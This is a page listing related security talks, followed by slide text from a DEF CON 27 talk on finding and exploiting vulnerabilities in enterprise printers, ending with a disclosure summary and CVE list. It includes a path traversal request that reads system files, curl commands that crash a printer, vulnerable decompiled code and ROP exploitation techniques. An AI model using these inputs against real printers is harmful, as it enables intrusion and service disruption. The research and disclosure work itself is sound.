Root via SMS: 4G access level security assessment, Sergey Gordeychik, Alexand...
Sergey Gordeychik
 
PDF
Practical IoT Exploitation (DEFCON23 IoTVillage) - Lyon Yang
Lyon Yang
 
PDF
DEF CON 24 - workshop - Craig Young - brainwashing embedded systems
Felipe Prado
 
PPTX
hacking-embedded-devices.pptx
ssuserfcf43f
 
PDF
BruCON 2010 Lightning Talks - DIY Grid Computing
tomaszmiklas
 
PDF
44CON 2014 - Switches Get Stitches, Eireann Leverett & Matt Erasmus
44CON
 
PPTX
BSides Hannover 2015 - Shell on Wheels
infodox
 
PDF
Finding the needle in the hardware haystack - HRES (1)
Tim Wright
 
PDF
Hardware hacking
Tavish Naruka
 
PPTX
Timothy Wright & Stephen Halwes - Finding the Needle in the Hardware – Identi...
centralohioissa
 
PDF
Os Selbak
oscon2007
 
Attacking Embedded Devices (No Axe Required)
Security Weekly
 
[cb22] Your Printer is not your Printer ! - Hacking Printers at Pwn2Own by A...
CODE BLUE
 
Steelcon 2015 - 0wning the internet of trash
infodox
 
Advanced SOHO Router Exploitation XCON
Lyon Yang
 
Linux Kernel Exploitation
Scio Security
 
amrapali builders @@hacking printers.pdf
amrapalibuildersreviews
 
Beginners guide on how to start exploring IoT 2nd session
veerababu penugonda(Mr-IoT)
 
Filip palian mateuszkocielski. simplest ownage human observed… routers
Yury Chemerkin
 
Simplest-Ownage-Human-Observed… - Routers
Logicaltrust pl
 
Root via SMS: 4G access level security assessment, Sergey Gordeychik, Alexand...
Sergey Gordeychik
 
Practical IoT Exploitation (DEFCON23 IoTVillage) - Lyon Yang
Lyon Yang
 
DEF CON 24 - workshop - Craig Young - brainwashing embedded systems
Felipe Prado
 
hacking-embedded-devices.pptx
ssuserfcf43f
 
BruCON 2010 Lightning Talks - DIY Grid Computing
tomaszmiklas
 
44CON 2014 - Switches Get Stitches, Eireann Leverett & Matt Erasmus
44CON
 
BSides Hannover 2015 - Shell on Wheels
infodox
 
Finding the needle in the hardware haystack - HRES (1)
Tim Wright
 
Hardware hacking
Tavish Naruka
 
Timothy Wright & Stephen Halwes - Finding the Needle in the Hardware – Identi...
centralohioissa
 
Os Selbak
oscon2007
 
Ad

More from Felipe Prado (20)

PDF
DEF CON 24 - Sean Metcalf - beyond the mcse red teaming active directory
Felipe Prado
 
PDF
DEF CON 24 - Bertin Bervis and James Jara - exploiting and attacking seismolo...
Felipe Prado
 
PDF
DEF CON 24 - Tamas Szakaly - help i got ants
Felipe Prado
 
PDF
DEF CON 24 - Ladar Levison - compelled decryption
Felipe Prado
 
PDF
DEF CON 24 - Clarence Chio - machine duping 101
Felipe Prado
 
PDF
DEF CON 24 - Chris Rock - how to overthrow a government
Felipe Prado
 
PDF
DEF CON 24 - Fitzpatrick and Grand - 101 ways to brick your hardware
Felipe Prado
 
PDF
DEF CON 24 - Rogan Dawes and Dominic White - universal serial aBUSe remote at...
Felipe Prado
 
PDF
DEF CON 24 - Jay Beale and Larry Pesce - phishing without frustration
Felipe Prado
 
PDF
DEF CON 24 - Gorenc Sands - hacker machine interface
Felipe Prado
 
PDF
DEF CON 24 - Allan Cecil and DwangoAC - tasbot the perfectionist
Felipe Prado
 
PDF
DEF CON 24 - Rose and Ramsey - picking bluetooth low energy locks
Felipe Prado
 
PDF
DEF CON 24 - Rich Mogull - pragmatic cloud security
Felipe Prado
 
PDF
DEF CON 24 - Grant Bugher - Bypassing captive portals
Felipe Prado
 
PDF
DEF CON 24 - Patrick Wardle - 99 problems little snitch
Felipe Prado
 
PDF
DEF CON 24 - Plore - side -channel attacks on high security electronic safe l...
Felipe Prado
 
PDF
DEF CON 24 - Six Volts and Haystack - cheap tools for hacking heavy trucks
Felipe Prado
 
PDF
DEF CON 24 - Dinesh and Shetty - practical android application exploitation
Felipe Prado
 
PDF
DEF CON 24 - Klijnsma and Tentler - stargate pivoting through vnc
Felipe Prado
 
PDF
DEF CON 24 - Antonio Joseph - fuzzing android devices
Felipe Prado
 
DEF CON 24 - Sean Metcalf - beyond the mcse red teaming active directory
Felipe Prado
 
DEF CON 24 - Bertin Bervis and James Jara - exploiting and attacking seismolo...
Felipe Prado
 
DEF CON 24 - Tamas Szakaly - help i got ants
Felipe Prado
 
DEF CON 24 - Ladar Levison - compelled decryption
Felipe Prado
 
DEF CON 24 - Clarence Chio - machine duping 101
Felipe Prado
 
DEF CON 24 - Chris Rock - how to overthrow a government
Felipe Prado
 
DEF CON 24 - Fitzpatrick and Grand - 101 ways to brick your hardware
Felipe Prado
 
DEF CON 24 - Rogan Dawes and Dominic White - universal serial aBUSe remote at...
Felipe Prado
 
DEF CON 24 - Jay Beale and Larry Pesce - phishing without frustration
Felipe Prado
 
DEF CON 24 - Gorenc Sands - hacker machine interface
Felipe Prado
 
DEF CON 24 - Allan Cecil and DwangoAC - tasbot the perfectionist
Felipe Prado
 
DEF CON 24 - Rose and Ramsey - picking bluetooth low energy locks
Felipe Prado
 
DEF CON 24 - Rich Mogull - pragmatic cloud security
Felipe Prado
 
DEF CON 24 - Grant Bugher - Bypassing captive portals
Felipe Prado
 
DEF CON 24 - Patrick Wardle - 99 problems little snitch
Felipe Prado
 
DEF CON 24 - Plore - side -channel attacks on high security electronic safe l...
Felipe Prado
 
DEF CON 24 - Six Volts and Haystack - cheap tools for hacking heavy trucks
Felipe Prado
 
DEF CON 24 - Dinesh and Shetty - practical android application exploitation
Felipe Prado
 
DEF CON 24 - Klijnsma and Tentler - stargate pivoting through vnc
Felipe Prado
 
DEF CON 24 - Antonio Joseph - fuzzing android devices
Felipe Prado
 

Recently uploaded (20)

PDF
How Open Source Changed My Career by abdelrahman ismail
a0m0rajab1
 
PDF
Presentation about Hardware and Software in Computer
snehamodhawadiya
 
PDF
Research-Fundamentals-and-Topic-Development.pdf
ayesha butalia
 
PPTX
What-is-the-World-Wide-Web -- Introduction
tonifi9488
 
PPTX
The-Ethical-Hackers-Imperative-Safeguarding-the-Digital-Frontier.pptx
sujalchauhan1305
 
PDF
BLW VOCATIONAL TRAINING SUMMER INTERNSHIP REPORT
codernjn73
 
PPT
Coupa-Kickoff-Meeting-Template presentai
annapureddyn
 
PDF
Data_Analytics_vs_Data_Science_vs_BI_by_CA_Suvidha_Chaplot.pdf
CA Suvidha Chaplot
 
PPTX
OA presentation.pptx OA presentation.pptx
pateldhruv002338
 
PDF
Google I/O Extended 2025 Baku - all ppts
HusseinMalikMammadli
 
PDF
Structs to JSON: How Go Powers REST APIs
Emily Achieng
 
PDF
A Strategic Analysis of the MVNO Wave in Emerging Markets.pdf
IPLOOK Networks
 
PPTX
Coupa-Overview _Assumptions presentation
annapureddyn
 
PDF
Cloud-Migration-Best-Practices-A-Practical-Guide-to-AWS-Azure-and-Google-Clou...
Artjoker Software Development Company
 
PDF
Event Presentation Google Cloud Next Extended 2025
minhtrietgect
 
PDF
Software Development Company | KodekX
KodekX
 
PDF
Using Anchore and DefectDojo to Stand Up Your DevSecOps Function
Anchore
 
PPTX
Comunidade Salesforce São Paulo - Desmistificando o Omnistudio (Vlocity)
Francisco Vieira Júnior
 
PPTX
AI and Robotics for Human Well-being.pptx
JAYMIN SUTHAR
 
PDF
CIFDAQ's Market Wrap : Bears Back in Control?
CIFDAQ
 
How Open Source Changed My Career by abdelrahman ismail
a0m0rajab1
 
Presentation about Hardware and Software in Computer
snehamodhawadiya
 
Research-Fundamentals-and-Topic-Development.pdf
ayesha butalia
 
What-is-the-World-Wide-Web -- Introduction
tonifi9488
 
The-Ethical-Hackers-Imperative-Safeguarding-the-Digital-Frontier.pptx
sujalchauhan1305
 
BLW VOCATIONAL TRAINING SUMMER INTERNSHIP REPORT
codernjn73
 
Coupa-Kickoff-Meeting-Template presentai
annapureddyn
 
Data_Analytics_vs_Data_Science_vs_BI_by_CA_Suvidha_Chaplot.pdf
CA Suvidha Chaplot
 
OA presentation.pptx OA presentation.pptx
pateldhruv002338
 
Google I/O Extended 2025 Baku - all ppts
HusseinMalikMammadli
 
Structs to JSON: How Go Powers REST APIs
Emily Achieng
 
A Strategic Analysis of the MVNO Wave in Emerging Markets.pdf
IPLOOK Networks
 
Coupa-Overview _Assumptions presentation
annapureddyn
 
Cloud-Migration-Best-Practices-A-Practical-Guide-to-AWS-Azure-and-Google-Clou...
Artjoker Software Development Company
 
Event Presentation Google Cloud Next Extended 2025
minhtrietgect
 
Software Development Company | KodekX
KodekX
 
Using Anchore and DefectDojo to Stand Up Your DevSecOps Function
Anchore
 
Comunidade Salesforce São Paulo - Desmistificando o Omnistudio (Vlocity)
Francisco Vieira Júnior
 
AI and Robotics for Human Well-being.pptx
JAYMIN SUTHAR
 
CIFDAQ's Market Wrap : Bears Back in Control?
CIFDAQ
 

DEF CON 27 - DANIEL ROMERO and MARIO RIVAS - why you should fear your mundane office

  • 1. Why you should fear your "mundane" office equipment Daniel Romero @daniel_rome Mario Rivas @grifo
  • 2. Who the hell are these guys? Daniel Romero Pérez  Principal Security Consultant  Focused on IoT / Embedded Systems  Hardware, RE, exploiting, etc.  @daniel_rome  [email protected] Mario Rivas Vivar  Senior Security Consultant  Too many interests  Last focused in what you will see here   @grifo  [email protected] Both from ´s Madrid office
  • 3. Agenda  Introduction and attack surface  Testing methodology and fuzzing  A way across the vulnerabilities found  Let’s exploit something!  Conclusions
  • 5. Introduction  Figure out the current state of security of enterprise embedded devices (such as printers)  Medium-size enterprise printers:  Xerox, HP  Ricoh, Brother  Lexmark, Kyocera  Red Teaming approach  It wasn’t an assessment  One RCE vuln would be enough
  • 6. Why printers?  Networked printers have been around since at least the 1980s  They sit and are configured on sensitive parts of corporate networks  Great for pivoting and launch network attacks  They process all manner of information  Corporate Sensitive, Personal Sensitive, Financial, Customer etc.  They are often assumed to be low risk targets and fairly dumb in capability  Shadow IT – printers might be purchased through unofficial procurement channels
  • 7. Why printers?  Networked printers have been around since at least the 1980s  They sit and are configured on sensitive parts of corporate networks  Great for pivoting and launch network attacks  They process all manner of information  Corporate Sensitive, Personal Sensitive, Financial, Customer etc.  They are often assumed to be low risk targets and fairly dumb in capability  Shadow IT – printers might be purchased through unofficial procurement channels
  • 10. Attack Surface Embedded device:  RTOS  Linux Printer Lang and Services Mgmt. Services and others External Services Proximity Attacks: WiFi, USB, NFC, etc. Mobile Apps Web App And Web Serv File Parsers Updates & Firmware Hardware Analysis Post Exploitati on
  • 11. Attack Surface Embedded device:  RTOS  Linux Printer Lang and Services Mgmt. Services and others External Services Web App And Web Serv Updates & Firmware Hardware Analysis Post Exploitati on
  • 12. Huge Attack Surface Hardware Exposed Services UART/Serial Firmware Firmware Updates Printer Services RAWIPPLPD SMB FTP Web and Web Services Management Services External Software SNMP Netbios External Interactions Remote Management Printer Capabilities WiFi Included in the “scope” Not Tested (future work?) Google Cloud Print Web Services Web Application JTAG Exposed Memories Maintenance Modes NFC WiFi Direct Access AirPrint Telnet Printer Languages / File Formats PJL PCL PS PDF Image Formats Others Mobile Apps Desktop Applications Other Services Finger MDNS SVRLOC VNC Unknown Services L2 / L3 Protocols TCP UDP ICMP …
  • 15. Fuzzing & Approach Taken  Dumb Fuzzing  Get valid communications  Generate random (and invalid) mutations  Start fuzzing after a few minutes  Understanding the crash is harder  Smart Fuzzing  Implement RFC compliant messages  Mutate what you want, how you want  More coding time  Way easier to investigate the crash
  • 16. Our fuzzer  The main objective was to make our life easier while fuzzing  Based on Sulley Fuzzer for data generation [https://github.com/OpenRCE/sulley]  Actually, a fork from BooFuzz [https://github.com/jtpereyda/boofuzz]  Great Request, Connection, Logger and Session modules  After Sulley and Boo… Wazowski was next, so…  We called it Fuzzowski  Python3  Improved Strings fuzzing libraries,  Custom lists, files and callback command injection mutations  Fuzzer modules, to keep all your fuzzers under one single program  Lots of little tweaks to adapt the fuzzing session  We try to solve the difficulties that we were having while fuzzing…
  • 17. Fuzzowski Difficulties  Different behaviours for the same protocols  Different ways to detect a crash  Need to reboot targets manually after a crash  Retesting a “suspect” packet can be a pain  Understanding your mutated packets can be hard  Need to report to the manufacturer a lot of different crashes Our Solutions Flexibility to adapt the fuzzing session Monitor modules to check what we want Restarter modules which are called after losing connection to the target CLI to pause and control the fuzzing session Nice print formats for suspect packets (to know exactly what was fuzzed) Save standalone scripts to send a crash PoC
  • 20. The code will be available after the talk: https://github.com/nccgroup/fuzzowski
  • 21. Just a bit of Hardware
  • 22. Hardware Analysis  Basic approach!  Focused on things to help us with the exploitation  Debug interfaces  Dump memories  Test points and...  Short circuit all the things!  One of our printers will never print again…
  • 23. Exposed Memories # ./flashrom -V -p buspirate_spi:dev=/dev/ttyUSB0,spispeed=1M -r /tmp/flash.bin -c MX25L12835F/MX25L12845E/MX25L12865E flashrom 0.9.9-91-g0bfa819 on Linux 4.15.0-42-generic (x86_64) flashrom is free software, get the source code at https://flashrom.org flashrom was built with libpci 3.2.1, GCC 4.8.4, little endian Command line (7 args): ./flashrom -V -p buspirate_spi:dev=/dev/ttyUSB0,spispeed=1M -r /tmp/flash.bin -c MX25L12835F/MX25L12845E/MX25L12865E Using clock_gettime for delay loops (clk_id: 1, resolution: 1ns). Initializing buspirate_spi programmer Detected Bus Pirate hardware v3b Detected Bus Pirate firmware 5.10 Using SPI command set v2. SPI speed is 1MHz Raw bitbang mode version 1 Raw SPI mode version 1 The following protocols are supported: SPI. Probing for Macronix MX25L12835F/MX25L12845E/MX25L12865E, 16384 kB: probe_spi_rdid_generic: id1 0xc2, id2 0x2018 ...
  • 24. Hardware Issues  UART/Serial Debugging Ports  Tons of debug information  Write and execute your assembly here! JTAG UART 1 - GND (black) 2 - Rx (yellow) 3 - Tx (green) 4 - VCC Pinout 1 - GND 2 - Rx 3 - Tx 4 - VCC Pinout JTAG UART JRS1 1 - GND 2 - Rx 3 - Tx 4 - VCC JRS2 1 - VCC 2 - Rx 3 - Tx 4 - GND Pinout
  • 25. Hardware Issues  Hardware Backdooring:  Serial allowed read, write and execute  Raspberry Pi → hardware backdoor  Pi connected to WiFi AP Printer UART Pinout VCC GNC Rx Tx Raspberry PI Pinout (4) 5V (6) GND (8) GPIO 14 (TXD) (10) GPIO 15 (RXD) 363:[199714]:<kb_uart >addr/address:show address value 364:[199714]:<kb_uart >addrc/addressc:change address value 367:[199714]:<kb_uart >sh:show shell command help 368:[199714]:<kb_uart >shell:shell run a function in task mode 369:[199714]:<kb_uart >sd/shelld:stop a running shell task 370:[199714]:<kb_uart >sda/shelld,all:stop all running shell task 371:[199714]:<kb_uart >Shell command example: 372:[199714]:<kb_uart >[shell 0x12345678 1234] 373:[199714]:<kb_uart >shell run a function locate at 0x12345678 with arg 1234
  • 27. Common Web Application Issues  Weak Default Configurations  Tons of services exposed enabled by default, with weak configurations  Default Credentials (or no credentials required!)  Clear Text Communications  Cross-Site Request Forgery  Broken Access Controls  Cross-Site Scripting issues
  • 29. Path Traversal  Allowed to access some file extensions anywhere in the filesystem  sh, js, css, htm...  Allowed to check if a file existed or not  Could also be used to get files that otherwise would require authentication okhtmfile=/js/../../../etc/passwd - Error 500 okhtmfile=/js/../../../etc/notexist – Error 404 POST /box/set.cgi HTTP/1.1 Content-Type: application/x-www-form-urlencoded okhtmfile=/js/../../../../../../etc/init.d/host name.sh&failhtmfile=[...] HTTP/1.1 200 OK ETag: "/js/../../../../../../etc/init.d/hostname.sh, Wed, 30 Jan 2019 09:53:39 GMT" Content-Type: application/x-sh #!/bin/sh ### BEGIN INIT INFO # Default-Start: S # Default-Stop: # Short-Description: Set hostname based on /etc/hostname ### END INIT INFO HOSTNAME=$(/bin/hostname) hostname -b -F /etc/hostname 2> /dev/null […]
  • 30. these issues are not bad, but…
  • 35.  Printer 1  Multiple Buffer Overflow Parsing Cookies Values (x6)  Buffer Overflow Setting WiFi Values  Buffer Overflow Setting mDNS Values  Buffer Overflow Setting Notification Alerts  Buffer Overflow Setting POP3 Values  Buffer Overflow Setting SMTP Values  Denial of Service Setting SNMP Values  LPD Denial of Service by Sending a Queue command  Buffer Overflow Sending a Crafted LPD Packet  Multiple Buffer Overflows Parsing IPP Packets (x3)  Printer 2  Buffer Overflow in Fax Number  Buffer Overflow in IPP attribute names  Buffer Overflow in IPP attribute values  Buffer Overflow in IPP attribute sizes  Multiple Buffer Overflows in IPP parser  Printer 3  Buffer Overflow in “AuthCookie” cookie  Heap Buffer Overflow in IPP attribute’s name  Printer 4  Buffer Overflow in Content-Type Header  Buffer Overflow in Authentication Cookie  Multiple Buffer Overflows parsing IPP Attributes (x3)  Buffer Overflow in Google Cloud Print  Printer 5  Buffer Overflow Parsing The LexLang Cookie  Buffer Overflow Parsing The Request URI (x6)  Buffer Overflow Parsing Content-Type Headers  Memory Corruption in SNMP (DoS)  Memory Corruption Parsing Config Parameters  Printer 6  Buffer Overflow parsing URI paths  Buffer Overflow in several Web Application Functionalities  Buffer Overflow with Big Control Files in LPD  Multiple Memory Corruptions Parsing IPP Packets Memory Corruption Issues
  • 36. Memory Corruption Issues – Crashes Everywhere Exception address: 0x58585858 Current Processor Status Register: 0x60000013 Task: 0x17bd770 "HC02P“ ... Exception PC = 0x58585858 Current PSR = 0x60000013 -------------------------------------------- TRACE STACK: -------------------------------------------- current stack = 0x017be52c start stack = 0x00100000 text_start = 0x00100000 text_end = 0x00a35220 -------------------------------------------- 001 : 0x0039c720 002 : 0x0011ad24
  • 38. CVE-2019-14300: Multiple Stack Buffer Overflow Parsing Cookies Values (x6) Stack Buffer Overflow – The easy case
  • 39. Vuln. Exploitation - Going back to 90's exploits? Stack Buffer Overflow – The easy case // Decompiled source code lang_ptr = f_strstr(cookie_header, "print_language"); lang_ptr2 = lang_ptr; if ( p_lang_pointer ) { v5 = * p_lang_pointer; v6 = v5; if ( v5 != ';' ) v6 = v5; if ( v6 ) { count = 0; } else { count = 0; do { ++count; v9 = * p_lang_pointer++[ 1]; v8 = v9= v10; if ( v9 != ';' ) v10 = v8; } while ( !v10 ); } strncpy(v_tmp_cookie, (lang_ptr2 + 15), count - 15); // Stack Buffer Overflow } * Do you really think there is only one bug here? print_language = XXXXXXXXXXXXXX.. Cookie bytes: 0-14 15 16-N
  • 40. Vuln. Exploitation - Going back to 90's exploits? Stack Buffer Overflow – The easy case // Decompiled source code lang_ptr = f_strstr(cookie_header, "print_language"); lang_ptr2 = lang_ptr; if ( p_lang_pointer ) { v5 = * p_lang_pointer; v6 = v5; if ( v5 != ';' ) v6 = v5; if ( v6 ) { count = 0; } else { count = 0; do { ++count; v9 = * p_lang_pointer++[ 1]; v8 = v9= v10; if ( v9 != ';' ) v10 = v8; } while ( !v10 ); } strncpy(v_tmp_cookie, (lang_ptr2 + 15), count - 15); // Stack Buffer Overflow } * Do you really think there is only one bug here? print_language = XXXXXXXXXXXXXX.. Cookie bytes: 0-14 15 16-N # DoS Proof of Concept 1: $ curl --cookie "print_language=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX" http://printer/index.asp # DoS Proof of Concept 2: $ curl -H 'Cookie: print_language;' http://printer/index.asp
  • 41. Stack Buffer Overflow – The easy case  ASLR (HEAP & STACK)  No SW Debug  RTOS (1Kernel / 1Binary) Vuln. Exploitation - Going back to 90's exploits? Send Shellcode (btw. patterns) Dump RAM (Mem. Leak) Identify Shellcode address Trigger the BoF Jump to the Shellcode Exploitation chain:  Direct PC overwritten  Potential RWX  No NX  Mem leak Helpers:Difficulties:
  • 42. Stack Buffer Overflow – The easy case But, what is one of the most important data managed by a printer? THE DOCUMENTS!
  • 43. Stack Buffer Overflow – The easy case DEMO
  • 45. Buffer Overflow – The tricky case CVE-2019-13193: Buffer Overflow in Cookie Values  One of the first bugs found  Initially , it was not analyzed in depth as:  No SOFTWARE or HARDWARE debug  The Kernel implements other protections GET /deadbeef HTTP/1.1 Host: printer User-Agent: Mozilla/5.0 Gecko/20100101 Firefox/62.0 Accept-Language: en-US Cookie: AuthCookie=5a482cb4aabdcc97d5293221dff2ee7f5ca:4hh7fA4675FOnWgJfA7mCq2NsaU6AwoAAA%3D%3DAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[SNIP] Connection: close Part 1 Part 2
  • 46. CVE-2019-13193: Buffer Overflow in Cookie Values AuthCookie=5a482cb408cc97d5298b6eff2ee7f5ca:4hh7fA4675FOnWgJfA7mCq2NsaU6AwoAAA %3D%3DAAAAAAAAAAAAAAAAAA[SNIP] After RE’ing the printer’s firmware: 1) Parse headers 2) Get cookies values 3) Check the first part of the cookie 4) Get and check the second part of the cookie (after “:”) 4.1) Decode the base64 value 4.2) Get a TOKEN and a KEY from memory 4.3) Calculate a SHA1 HASH from KEY 4.4) … Buffer Overflow – The tricky case
  • 47. CVE-2019-13193: Buffer Overflow in Cookie Values Buffer Overflow – The tricky case struct cookie_s { int *src_ptr; # base64 cookie string int *dst_ptr; # base64 decoded result char junk[4]; __int16 src_len; # source len __int16 dst_len; # destination len }; base64_decode(struct *cookie_s)
  • 48. CVE-2019-13193: Buffer Overflow in Cookie Values int get_check_second_part_cookie(int *b64_cookie_text) {..} Buffer Overflow – The tricky case Q: Can you spot the bug? struct cookie_s { int *src_ptr; # base64 cookie string int *dst_ptr; # base64 decoded result char junk[4]; __int16 src_len; # source len __int16 dst_len; # destination len };
  • 49. Buffer Overflow – The tricky case CVE-2019-13193: Buffer Overflow in Cookie Values Function get_check_second_part_cookie() emulation: Calling to: strlen, base64_decode, etc. $ python check-cookie-emul.py $(python -c 'print "A"*100' | base64 -w 0) ========================== Emulating THUMB code snip - >>> Tracing instruction at 0x1474b78, instruction size = 0x2 ERROR: Invalid memory fetch (UC_ERR_FETCH_UNMAPPED) >>> r0 = 0x3 >>> r3 = 0x1281010 >>> r4 = 0x41414141 >>> r5 = 0x41414141 >>> lr = 0x1001000 >>> sp = 0x1002000 >>> pc = 0x41414140 ========== SP register: 4141414141414141414141414141414141414141414141414141414141414141414141000000000000 https://www.unicorn-engine.org/
  • 50. Buffer Overflow – The tricky case CVE-2019-13193: Buffer Overflow in Cookie Values But everything became insane here:  No executable STACK - NX  Firmware addresses didn’t work - ASLR?  Modified T-KERNEL (RTOS) in use:  Protection levels  Thousands of *linker* structures  Non monolithic OS - Apps / Tasks (Offsets)  Shared memory  Can implement MMU Therefore, we didn’t know:  Where and how our shellcode can be execute ( ~ASLR + NX )  Valid addresses to create a ROP chain
  • 51. Buffer Overflow – The tricky case CVE-2019-13193: Buffer Overflow in Cookie Values Some potential (and insane) approaches:  RE the T-KERNEL structure – No time!  RE the bootloader (potential static addresses)  Identify static memory – Permissions?  Brute-force random addresses  Looking for code helpers Infinite Loop! - Blind Exploitation?
  • 52. CVE-2019-13193: Buffer Overflow in Cookie Values Brute-forcing the PC register with potential firmware addresses and figure out what instructions were executed.. Example 1 - Identifying POP instructions: Buffer Overflow – The tricky case Potential Epilog 1: 0x10: ... 0x12: ... 0x14: pop {r0, pc} AAAA AAAA AAAA INFINITE_LOOP … SP PC: 0x14 Before execution AAAA AAAA AAAA INFINITE_LOOP … SP R0: AAAA PC: AAAA After execution PRINTER DOWN!
  • 53. CVE-2019-13193: Buffer Overflow in Cookie Values Brute-forcing the PC register with potential firmware addresses and figure out what instructions were executed.. Example 1B - Identifying POP instructions: Buffer Overflow – The tricky case Potential Epilog 1: 0x10: ... 0x12: ... 0x14: pop {r0, pc} AAAA INFINITE_LOOP … … … SP PC: 0x14 Before execution AAAA INFINITE_LOOP … … … SP R0: AAAA PC: INFINITE_LOOP After execution PRINTER UP!
  • 54. Buffer Overflow – The tricky case CVE-2019-13193: Buffer Overflow in Cookie Values Two matcheable behaviours, that allowed us to identify a valid offset assigned to the web RTOS task, were found. add sp, 28 pop {r0, r1, pc} 0x12 0x14 pop {r0-r7, pc}0x512 Printer Memory Firmware Data add sp, 28 pop {r0, r1, pc} 0x1132 0x1134 pop {r0-r7, pc}0x1632 .... .... 0x500  Task Offset: 0x1132 - 0x12 = 0x1120  Only for this (web) RTOS task  This provided us useful ROP gadgets and potential helpers to continue the task execution (which is really important)
  • 55. Buffer Overflow – The tricky case What about creating ROP chains with (not coherent) IMAGE (GIF or PNG) offsets? $ for i in `ls *.{gif,png}`; do echo "========== $i"; python ROPgadget.py --rawArch=arm --rawMode=thumb -- binary $i | grep "pop {"; done | grep -E "(==|str r6)" ========== adhoc.gif ========== allow2.gif - SNIP - ========== device-icons-128.png 0x000000000000034e : str r6, [r5, #0x20] ; lsls r5, r2, #0x1a ; subs r0, #0xa9 ; pop {r1, r4, r5, r6, pc} 0x0000000000000346 : strh r2, [r7, #0x12] ; ldm r6, {r1, r2, r3, r6, r7} ; ldrh r6, [r1, r1] ; add r4, sp, #0x144 ; str r6, [r5, #0x20] ; lsls r5, r2, #0x1a ; subs r0, #0xa9 ; pop {r1, r4, r5, r6, pc} ========== device-icons-512.png 0x0000000000009eb4 : adds r4, #0x61 ; adds r4, r0, #1 ; b #0xa346 ; strh r2, [r3, r5] ; str r6, [sp, #0x14c] ; stm r5!, {r0, r4, r6} ; pop {r2, r4, r5, r6, pc} - SNIP - CVE-2019-13193: Buffer Overflow in Cookie Values "Debug Information Exposed": http://printer/httpd/diag/url_list.html
  • 56. Buffer Overflow – The tricky case CVE-2019-13193: Buffer Overflow in Cookie Values Approach: Using ROP gadgets found to write a shellcode into a RWX memory (e.g. PNG files) and jump to it. Instruction and Data CACHES! Some options to flush the cache:  ARM Instruction: MOV r0, #0 + MCR p15, 0, r0, c7, c5, 0 ; Clear r0 + Flush entire  Sleep(), mprotect(), etc. calls  Continue the execution flow (harder, but the most “professional” option)
  • 57. Buffer Overflow – The tricky case CVE-2019-13193: Buffer Overflow in Cookie Values Continuing the execution flow: 1) ROP (part 1) should execute our payload 2) ROP (part 2) should change the address (within stack), that overwrites PC once the bug is triggered, with a valid function address (e.g. func 1.1.1) 3) ROP (part 3) should align the SP to the previous state, just before triggering the bug. 4) Trigger the vuln as many times as you want SP = 0x1000Func. 1 Task Stack Frames SP = 0x900Func. 1.1 SP = 0x700Func. 1.1.1 SP = 0x550Vuln. Func .... SP = 0x5000 SP = 0x4000 SP = 0x3000 SP = 0x17c0
  • 58. CVE-2019-13193: Buffer Overflow in Cookie Values Stack Buffer Overflow – The tricky case DEMO $ python exploit-persepolis-v2.py [*] [*] .-------. Printer buffer overflow exploit (Persepolis) [*] | ROOT | Author: Daniel Romero (NCC Group) [*] __|_______|__ [*] | _________--| Firm ver: [REDACTED] [*] `-/.:::::::.-' [*] `----------' [*] [*] [*] Usage: ./exploit-persepolis-v2.py write [BYTES_TO_BE_WRITTEN] [JUMP TO SHELLCODE Y/N] [*] ./exploit-persepolis-v2.py writefile [FILE_PATH] [*] ./exploit-persepolis-v2.py read [SOURCE_ADDRESS] [SIZE] [*]
  • 60. Responsible Vulnerability Disclosure  We started this process in February!  Mixed response from the printer manufacturers  Some had very mature vulnerability disclosure procedures  Some others did not have any process for this, 2 months stuck trying to contact some of them  All have published patches solving most of the issues by now  Security advisories already published:  https://www.nccgroup.trust/us/our-research/technical-advisory-multiple-vulnerabilities-in-lexmark-printers/  https://www.nccgroup.trust/us/our-research/technical-advisory-multiple-vulnerabilities-in-hp-printers/  https://www.nccgroup.trust/us/our-research/technical-advisory-multiple-vulnerabilities-in-brother-printers/  https://www.nccgroup.trust/us/our-research/technical-advisory-multiple-vulnerabilities-in-ricoh-printers/  https://www.nccgroup.trust/us/our-research/technical-advisory-multiple-vulnerabilities-in-xerox-printers/  https://www.nccgroup.trust/us/our-research/technical-advisory-multiple-vulnerabilities-in-kyocera-printers/
  • 62. CVE List HP CVE-2019-6323 Reflected Cross-Site Scripting CVE-2019-6324 Stored Cross-Site Scripting CVE-2019-6325 Cross-Site Request Forgery CVE-2019-6326 Multiple Buffer Overflow in Web CVE-2019-6327 Multiple Buffer Overflow in IPP Lexmark CVE-2019-9930 Multiple Buffer Overflows in Web CVE-2019-9931 SNMP Denial of Service Vulnerability CVE-2019-9932 Multiple Buffer Overflows in Web CVE-2019-9933 Multiple Buffer Overflows in Web CVE-2019-9934 Information Disclosure Vulnerabilities CVE-2019-9935 Information Disclosure Vulnerabilities CVE-2019-10057 Cross-Site Request Forgery CVE-2019-10058 No Account Lockout Implemented CVE-2019-10059 Information Disclosure Vulnerability Xerox CVE-2019-13165 Multiple Buffer Overflow in IPP CVE-2019-13166 No Account Lockout Implemented CVE-2019-13167 Multiple Stored Cross-Site Scripting CVE-2019-13168 Multiple Buffer Overflow in IPP CVE-2019-13169 Buffer Overflow in HTTP Headers CVE-2019-13170 Cross-Site Request Forgery CVE-2019-13171 Buffer Overflow in Google Cloud Print Implementation CVE-2019-13172 Buffer Overflow in Authentication Cookie Brother CVE-2019-13192 Heap Overflow in IPP Attribute Names CVE-2019-13193 Stack Buffer Overflow in Cookie Values CVE-2019-13194 Information Disclosure Vulnerability in Web Server Kyocera CVE-2019-13195 Path Traversal in Web Server CVE-2019-13196 Multiple Buffer Overflow in Web Server (1) CVE-2019-13197 Multiple Buffer Overflow in Web Server (2) CVE-2019-13198 Stored Cross-Site Scripting CVE-2019-13199 Lack of Cross-Site 